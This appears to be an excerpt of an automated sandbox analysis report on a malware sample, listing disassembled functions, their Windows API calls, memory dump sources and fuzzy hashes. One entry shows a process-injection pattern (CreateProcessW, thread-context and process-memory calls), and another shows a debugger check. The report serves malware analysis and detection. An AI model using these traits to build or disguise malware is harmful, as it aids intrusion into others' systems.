Instruction Fuzzy Hash: 47E08632241214B7DB311B54AC49FDE7B28EB06774F104110FB667A4E097B126118798

Function 00C6BB64 Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00C6BB72

Part of subcall function 00C41C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00C47A85), ref: 00C41CB1
Part of subcall function 00C41C9D: GetLastError.KERNEL32(00000000,?,00C47A85), ref: 00C41CC3

_free.LIBCMT ref: 00C6BB83
_free.LIBCMT ref: 00C6BB95

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 20f76424029b3f4f106c4d8a086868d24a1af312dab904e69dcb584714f23b8e
Instruction ID: 0301e9f70e7310e48dc56f5d114550556b1d58e96aba4d1a9f0ca90b83560f01
Opcode Fuzzy Hash: 20f76424029b3f4f106c4d8a086868d24a1af312dab904e69dcb584714f23b8e
Instruction Fuzzy Hash: 25E05BA175174147DA3465796EC4EB313CC5F44351718081DB8BAE7146CF24FDC095B4

Function 00C22322 Relevance: 3.9, APIs: 3, Instructions: 159COMMON

Download Yara Rule

APIs

Part of subcall function 00C222A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00C224F1), ref: 00C22303

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00C225A1
CoInitialize.OLE32(00000000), ref: 00C22618
CloseHandle.KERNEL32(00000000), ref: 00C9503A

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 3815369404-0
Opcode ID: 5f741709c66c622d365440c9422cc151e8c637d01cebfceb7e564ec39f64bb2f
Instruction ID: eeb12e46ab5b28b55114344e1c26293d681f72f91003ba99653683b1e3a6400b
Opcode Fuzzy Hash: 5f741709c66c622d365440c9422cc151e8c637d01cebfceb7e564ec39f64bb2f
Instruction Fuzzy Hash: 01718BB49013C18EC704EF6AADD179DBBA4BB98344788426EDA0ACF7B2CB344460DF15

Function 00C6BBE8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00C6BC18

Strings

EA06, xrefs: 00C6BC46

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: __fread_nolock
String ID: EA06
API String ID: 2638373210-3962188686
Opcode ID: 76f685ffbe6d08068633e6bfcb988b4ffcf8bd58733e44e6eb870b540223c4d9
Instruction ID: 22f89b0af508c58c2a21873821deb6b71c8097143411b267ca19693c6c665a03
Opcode Fuzzy Hash: 76f685ffbe6d08068633e6bfcb988b4ffcf8bd58733e44e6eb870b540223c4d9
Instruction Fuzzy Hash: 8201D8729042587EDB28C7A8CC56FEEBBF89B15301F00455BF593D61C1E9B4E7089B60

Function 00C80828 Relevance: 3.2, APIs: 2, Instructions: 232COMMON

Download Yara Rule

APIs

_strcat.LIBCMT ref: 00C808FD

Part of subcall function 00C2936C: __swprintf.LIBCMT ref: 00C293AB
Part of subcall function 00C2936C: __itow.LIBCMT ref: 00C293DF

_wcscpy.LIBCMT ref: 00C8098C

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: __itow__swprintf_strcat_wcscpy
String ID:
API String ID: 1012013722-0
Opcode ID: 10a62b2eb2806fe4164c719192b209624d5ec714017744c70d4ab74e8c561fdb
Instruction ID: 5357c00c469ba9de92775b55e99582e482aaca120875a96787f58a2ccb29eaf7
Opcode Fuzzy Hash: 10a62b2eb2806fe4164c719192b209624d5ec714017744c70d4ab74e8c561fdb
Instruction Fuzzy Hash: 81915934A00614DFCB58EF18D4919A9B7E5FF59314B61806DE81ACF3A2DB30ED45DB84

Function 00C48E63 Relevance: 3.1, APIs: 2, Instructions: 127COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00C47C0E: __getptd_noexit.LIBCMT ref: 00C47C0E

__getbuf.LIBCMT ref: 00C48EFA
__lseeki64.LIBCMT ref: 00C48F6A

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: __getbuf__getptd_noexit__lseeki64
String ID:
API String ID: 3311320906-0
Opcode ID: d3afe88f1646db73d16baf3d0840275390d4d191ee0872c58fd67cba2a8dcb17
Instruction ID: 52902ed09c79389d2c2ef8dab9677a582080edd122baef9b68ce34ad493dd4ff
Opcode Fuzzy Hash: d3afe88f1646db73d16baf3d0840275390d4d191ee0872c58fd67cba2a8dcb17
Instruction Fuzzy Hash: C5410271500B019FE7249FADC881A7E77A6BF85330B14861DF8BA872D1DB78DD488B51

Function 00C23A0F Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00C23A73

Part of subcall function 00C41405: __lock.LIBCMT ref: 00C4140B

Part of subcall function 00C23ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00C23AF3
Part of subcall function 00C23ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00C23B08

Part of subcall function 00C23D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00C23AA3,?), ref: 00C23D45
Part of subcall function 00C23D19: IsDebuggerPresent.KERNEL32(?,?,?,?,00C23AA3,?), ref: 00C23D57
Part of subcall function 00C23D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,00CE1148,00CE1130,?,?,?,?,00C23AA3,?), ref: 00C23DC8
Part of subcall function 00C23D19: SetCurrentDirectoryW.KERNEL32(?,?,?,00C23AA3,?), ref: 00C23E48

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00C23AB3

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
String ID:
API String ID: 924797094-0
Opcode ID: 6766ff3a18e0953db9418761db18733d4c2bff02e8da975fee3c7d5fe840ee53
Instruction ID: 440c5847f2eafc743d0f81b3aaca55488c3959162ca917ec53648b550f7b366a
Opcode Fuzzy Hash: 6766ff3a18e0953db9418761db18733d4c2bff02e8da975fee3c7d5fe840ee53
Instruction Fuzzy Hash: BA1190719043819FC700EF69E885B0EBBE8FB94710F04491EF8858B2A1DB709A94DB92

Function 00C4E9D2 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

___lock_fhandle.LIBCMT ref: 00C4EA29
__close_nolock.LIBCMT ref: 00C4EA42

Part of subcall function 00C47BDA: __getptd_noexit.LIBCMT ref: 00C47BDA

Part of subcall function 00C47C0E: __getptd_noexit.LIBCMT ref: 00C47C0E

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: __getptd_noexit$___lock_fhandle__close_nolock
String ID:
API String ID: 1046115767-0
Opcode ID: db1ba4c3c3812aa2747818e8ac4a847f469a1d3fb6d61f65c39f89d53a1c3178
Instruction ID: 16a48ef9f8080a88e565c190b104063f52410b542b0c29d3745f7ddb0deb4660
Opcode Fuzzy Hash: db1ba4c3c3812aa2747818e8ac4a847f469a1d3fb6d61f65c39f89d53a1c3178
Instruction Fuzzy Hash: 391182728056508BD711BFA4C88135C7E61BF82331F274780E4705F1E3CBB48D40B6A5

Function 00C3F4EA Relevance: 3.0, APIs: 2, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 00C4395C: __FF_MSGBANNER.LIBCMT ref: 00C43973
Part of subcall function 00C4395C: __NMSG_WRITE.LIBCMT ref: 00C4397A
Part of subcall function 00C4395C: RtlAllocateHeap.NTDLL(01880000,00000000,00000001,00000001,00000000,?,?,00C3F507,?,0000000E), ref: 00C4399F

std::exception::exception.LIBCMT ref: 00C3F51E
__CxxThrowException@8.LIBCMT ref: 00C3F533

Part of subcall function 00C46805: RaiseException.KERNEL32(?,?,0000000E,00CD6A30,?,?,?,00C3F538,0000000E,00CD6A30,?,00000001), ref: 00C46856

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: cbe1f2b293d4ab6fb31ada6eb03dd8d75707690ef562cdfc9645ef758749b6b8
Instruction ID: f856046f1b5277b45e3f5c088aa1af5151c9b6a413af720741b337addda53a26
Opcode Fuzzy Hash: cbe1f2b293d4ab6fb31ada6eb03dd8d75707690ef562cdfc9645ef758749b6b8
Instruction Fuzzy Hash: F7F0227150021EA7DB05BF98DC019DE77ECAF02318F20483AF90AD2181CBB0DB81A2A6

Function 00C43839 Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C43868
__lock_file.LIBCMT ref: 00C43889

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: __lock_file_memset
String ID:
API String ID: 26237723-0
Opcode ID: f024b688dc97bc8af8e08a445ec46ee5c479288a36a788295b21dc05b3882d5f
Instruction ID: f16a48a9b296d3900f58c222e72438337c992ea12ce46fdbc8d18041c1d829b3
Opcode Fuzzy Hash: f024b688dc97bc8af8e08a445ec46ee5c479288a36a788295b21dc05b3882d5f
Instruction Fuzzy Hash: D3018F71C00249FBCF26AFA58C0699EBB61BFC1320F15822AF824561A1D7318B61FB91

Function 00C435E4 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00C47C0E: __getptd_noexit.LIBCMT ref: 00C47C0E

__lock_file.LIBCMT ref: 00C43629

Part of subcall function 00C44E1C: __lock.LIBCMT ref: 00C44E3F

__fclose_nolock.LIBCMT ref: 00C43634

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: ad0b0db36f9cf3ab476fb0f3bc6ce1dd10475492c161e0d0bb18e071d35a4cd1
Instruction ID: b7a14cc27a4757c5f6d443ee329b86ec9937402c06fd09c2094f5ec8231b7037
Opcode Fuzzy Hash: ad0b0db36f9cf3ab476fb0f3bc6ce1dd10475492c161e0d0bb18e071d35a4cd1
Instruction Fuzzy Hash: 75F0B431801645AADB11BF7588067AEBAE07F81734F268209F465AB2C1CB7C8B01BF56

Function 018CAFAD Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 018CB7DD
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 018CB801
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 018CB823

Memory Dump Source

Source File: 00000000.00000002.1692975510.00000000018C9000.00000040.00000020.00020000.00000000.sdmp, Offset: 018C9000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18c9000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
Instruction ID: 0f980a1812dd2a10b2d335d12e0e3100b0003e8a030c41a93bbccad1832e9832
Opcode Fuzzy Hash: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
Instruction Fuzzy Hash: 5C12DD24A24658C6EB24DF64D8507DEB232EF68740F1090ED910DEB7A4E77A4F81CF5A

Function 00C42957 Relevance: 1.6, APIs: 1, Instructions: 135COMMON

Download Yara Rule

APIs

__flush.LIBCMT ref: 00C42A0B

Part of subcall function 00C47C0E: __getptd_noexit.LIBCMT ref: 00C47C0E

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: __flush__getptd_noexit
String ID:
API String ID: 4101623367-0
Opcode ID: 604a52b038f9d89d146637e8f6a8a9ae492491e42f3dfb09f15d024a6db6c6d3
Instruction ID: af6ec1f288f785093f69faddee2da4165952383478ea42df4480f189aeaad4bc
Opcode Fuzzy Hash: 604a52b038f9d89d146637e8f6a8a9ae492491e42f3dfb09f15d024a6db6c6d3
Instruction Fuzzy Hash: 6A4183717007069FDB288EA9C8825AE7BB6FF94360F64852DFC65C7244EB70DE45AB40

Function 00C3ED18 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 00C3EDC7

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 5a572261f6f5746c801a9f370e3116b491b30895ee18f126004aa5168b98a8bd
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 4931E270A10105DBCB18DF19C480A69FBA6FF49340F6486A5E41ADF3A6DB30EEC1CB80

Function 00C99A75 Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00C99A80

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 4888dc1f3c34d26ce7051de335066fe8a120ae12a073a7fdff63febf6428e12e
Instruction ID: a834ed7f223419bd6ceeab5cb6e2f5a32f65c43604be04becf1509720c5b53d5
Opcode Fuzzy Hash: 4888dc1f3c34d26ce7051de335066fe8a120ae12a073a7fdff63febf6428e12e
Instruction Fuzzy Hash: 61417E705046118FDB24CF19C084B1ABBF0BF45304F2989ACE9AA4B762C376F846DF42

Function 00C4ED06 Relevance: 1.6, APIs: 1, Instructions: 66COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: __getptd_noexit
String ID:
API String ID: 3074181302-0
Opcode ID: 22a69a00514dccbd7f108ce7111e3437eea5826dbc901bff9d90989ed33c11fb
Instruction ID: d8e24ac66fea80ad39f0de706e34b1f2d2575089ece335822aaf06676cfa5ce0
Opcode Fuzzy Hash: 22a69a00514dccbd7f108ce7111e3437eea5826dbc901bff9d90989ed33c11fb
Instruction Fuzzy Hash: F9215172C056508FD7227FA8CC857593A61BF82335F260750E4714F1E2DBB48D40ABA1

Function 00C241A9 Relevance: 1.6, APIs: 1, Instructions: 63libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C24214: FreeLibrary.KERNEL32(00000000,?), ref: 00C24247

LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00C239FE,?,00000001), ref: 00C241DB

Part of subcall function 00C24291: FreeLibrary.KERNEL32(00000000), ref: 00C242C4

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Library$Free$Load
String ID:
API String ID: 2391024519-0
Opcode ID: 10a2b43665fbb980df5235624d5346621f3d45618ce57c04968e588723afc20f
Instruction ID: 2b50c5de55ca4e55df94e77a709a828f832910f20d5e8155eacf2ec516917253
Opcode Fuzzy Hash: 10a2b43665fbb980df5235624d5346621f3d45618ce57c04968e588723afc20f
Instruction Fuzzy Hash: 8211A331610226EBDF18FBB5EC06F9E77A99F40700F108429F596AA5C1DE70DA45AB60

Function 00C99B45 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 00C99B51

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: df737dcbb31f50057f411d004f05ec17cf04b1fae27e93d6fc5182d207ac696e
Instruction ID: 452b0069489dc122584b2a1416aaae38ebf19ca2018258e8a4d64b6227fceb2b
Opcode Fuzzy Hash: df737dcbb31f50057f411d004f05ec17cf04b1fae27e93d6fc5182d207ac696e
Instruction Fuzzy Hash: 732155705186018FDB24DF69C444B1ABBE1BF84304F24496CE9AA4B622C731E846DF92

Function 00C4AF61 Relevance: 1.6, APIs: 1, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

___lock_fhandle.LIBCMT ref: 00C4AFC0

Part of subcall function 00C47BDA: __getptd_noexit.LIBCMT ref: 00C47BDA

Part of subcall function 00C47C0E: __getptd_noexit.LIBCMT ref: 00C47C0E

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: __getptd_noexit$___lock_fhandle
String ID:
API String ID: 1144279405-0
Opcode ID: 8331bcb7f8f0e1a8d88550494ae7852486966c74d11b340b5af31088328ebbb3
Instruction ID: 1fa048755e524eee858f37a16efdc762d4fc070e250cfe6a4c1aa4d0a5f1db7a
Opcode Fuzzy Hash: 8331bcb7f8f0e1a8d88550494ae7852486966c74d11b340b5af31088328ebbb3
Instruction Fuzzy Hash: 251191B28056509FD7167FA4D88675E7A60BF82332F254740E4745F1E2C7B4CD41ABA2

Function 00C239DB Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
